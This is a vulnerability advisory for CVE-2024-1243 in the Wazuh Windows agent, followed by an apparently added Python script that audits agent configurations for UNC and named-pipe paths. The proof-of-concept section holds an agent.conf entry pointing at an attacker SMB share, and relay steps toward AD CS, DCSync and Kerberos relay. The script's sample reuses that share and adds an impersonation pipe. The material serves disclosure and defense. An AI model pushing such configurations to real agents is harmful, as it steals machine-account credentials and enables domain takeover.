Remote code execution and Local privilege escalation due to NetNTLMv2 hash theft in Wazuh < 4.8.0

Feb 7, 2024

CVE Number

CVE-2024-1243

Credits

Rilke Petrosky of Pentraze Cybersecurity

Summary

We’ve identified a critical security vulnerability affecting the Wazuh Windows agent which can be abused to achieve remote code execution (RCE) and local privilege escalation as NT AUTHORITY\SYSTEM by pushing a configuration that makes the agent monitor an attacker-controlled remote UNC path.

We tested the vulnerability against Wazuh version 4.7.2; at the time of writing, the main branch and alpha tags on the repository suggested the vulnerability was still present in the latest development version.

CVSS

8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Details

The Wazuh agent <localfile> configuration option doesn’t restrict the use of UNC paths (SMB shares, named pipes and others). An adversary who controls a Wazuh server, or who possesses an agent’s private key, can push <localfile> configurations to deployed agents that force them to open a UNC path served by an NTLM-relay SMB server or by an impersonating named pipe. Because the Windows agent runs as a service under NT AUTHORITY\SYSTEM, the SMB connection authenticates with the computer’s domain account, so the result is either the compromise of that account’s NetNTLMv2 authentication (which can be relayed) or the impersonation of the local NT AUTHORITY\SYSTEM account through the named pipe.

This affects all Wazuh agents for Windows prior to version 4.8.0. The severity is reduced by the additional complexity required to exploit it: the attacker must control the Wazuh server, obtain an agent’s private key, or be positioned to intercept and tamper with agent-manager traffic.

PoC

In this proof-of-concept scenario, an adversary achieves remote code execution as NT AUTHORITY\SYSTEM by forcing the Wazuh agent on a domain controller to read a UNC path, capturing the domain controller machine account’s NetNTLMv2 authentication and relaying it to Active Directory Certificate Services to obtain a certificate for that account, which is then used to authenticate to and execute code on any computer in the network.

  1. A Wazuh agent group is created with a custom agent.conf containing a <localfile> location that points to the UNC path of the attacker’s SMB server:
<agent_config>
    <localfile>
        <location>\\192.168.56.103\x\x</location>
        <log_format>syslog</log_format>
    </localfile>
</agent_config>
  2. The DC01 computer’s agent is added to the group carrying the attack configuration.

  3. The attacker waits for the agent to connect to the SMB server and captures the NetNTLMv2 authentication.

  4. Once the authentication is captured, it is relayed to Active Directory Certificate Services to obtain a certificate for the domain controller’s machine account. Multiple other attacks, such as NTLM relay to other services, DCSync and Kerberos relay for local privilege escalation, are possible with the same primitive.
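The check a defender wants for this issue is an audit of every <localfile> location an agent can be told to monitor, since the primitive is nothing more than a configuration entry. The following script is an added example written for this page, not code from the advisory or from the Wazuh project: it parses a Wazuh configuration fragment (a shared agent.conf of the kind the manager pushes from /var/ossec/etc/shared/<group>/, or an agent’s local ossec.conf) and flags locations that are UNC shares, named pipes or other device-namespace paths, which a Windows agent running as NT AUTHORITY\SYSTEM would open with the machine account. The sample agent.conf embedded in it is constructed for the example and reuses the advisory’s attacker path.

```python
"""Audit Wazuh <localfile> locations for UNC shares and named pipes.

Added example for this advisory; it is not Wazuh project code. Point it at
the shared agent.conf files on the manager (/var/ossec/etc/shared/<group>/)
or at an agent's local ossec.conf.
"""
import re
import sys
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Path forms that make the Windows agent open something other than a plain
# local file. Forward slashes are accepted because the Win32 file API treats
# //server/share exactly like \\server\share. Order matters: the more
# specific forms are tested first.
UNC_PATTERNS = [
    (re.compile(r"^[\\/]{2}[?.][\\/]UNC[\\/]", re.I), "extended-length UNC path"),
    (re.compile(r"^[\\/]{2}[?.][\\/]pipe[\\/]", re.I), "named pipe"),
    (re.compile(r"^[\\/]{2}[?.][\\/]"), "device namespace path"),
    (re.compile(r"^[\\/]{2}[^\\/?.][^\\/]*[\\/]"), "remote UNC share"),
]


def classify_location(location: str) -> Optional[str]:
    """Return the kind of non-local path, or None for an ordinary local path
    (drive-letter paths, or eventchannel names such as 'Security')."""
    loc = location.strip()
    for pattern, kind in UNC_PATTERNS:
        if pattern.match(loc):
            return kind
    return None


def parse_wazuh_config(text: str) -> ET.Element:
    """Wazuh files may hold several top-level <ossec_config> or <agent_config>
    blocks, which is not well-formed XML, so wrap them in a synthetic root."""
    return ET.fromstring("<wazuh_audit_root>" + text + "</wazuh_audit_root>")


def find_unc_localfiles(text: str) -> List[Dict[str, str]]:
    """Every <localfile> whose <location> is a UNC share, named pipe or other
    device-namespace path, in document order."""
    findings = []
    for localfile in parse_wazuh_config(text).iter("localfile"):
        location = (localfile.findtext("location") or "").strip()
        kind = classify_location(location)
        if kind is not None:
            findings.append({
                "location": location,
                "kind": kind,
                "log_format": (localfile.findtext("log_format") or "").strip(),
            })
    return findings


# Constructed sample agent.conf: two legitimate entries followed by the
# advisory's attacker share and an impersonation named pipe.
SAMPLE_AGENT_CONF = r"""
<agent_config os="Windows">
    <localfile>
        <location>C:\inetpub\logs\LogFiles\W3SVC1\*.log</location>
        <log_format>iis</log_format>
    </localfile>
    <localfile>
        <location>Security</location>
        <log_format>eventchannel</log_format>
    </localfile>
    <localfile>
        <location>\\192.168.56.103\x\x</location>
        <log_format>syslog</log_format>
    </localfile>
    <localfile>
        <location>\\.\pipe\attacker</location>
        <log_format>syslog</log_format>
    </localfile>
</agent_config>
"""


def main(argv: List[str]) -> int:
    """Audit the file named on the command line, or the embedded sample.
    Exits non-zero when anything was flagged so it can gate a config push."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_AGENT_CONF
    findings = find_unc_localfiles(text)
    for finding in findings:
        print(f"{finding['kind']:<26} {finding['location']}  "
              f"(log_format={finding['log_format']})")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it on the manager against each group’s agent.conf before it is distributed, or on a Windows host against the agent’s own ossec.conf; a non-zero exit means at least one entry was flagged. The device-namespace class is reported for manual review rather than as a definite finding, because \\?\C:\... resolves to a local drive while \\?\UNC\... and \\.\pipe\... do not. The audit is a compensating control only: the fix is to upgrade the agent to 4.8.0 and to restrict who can write to the shared agent.conf directory on the manager.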
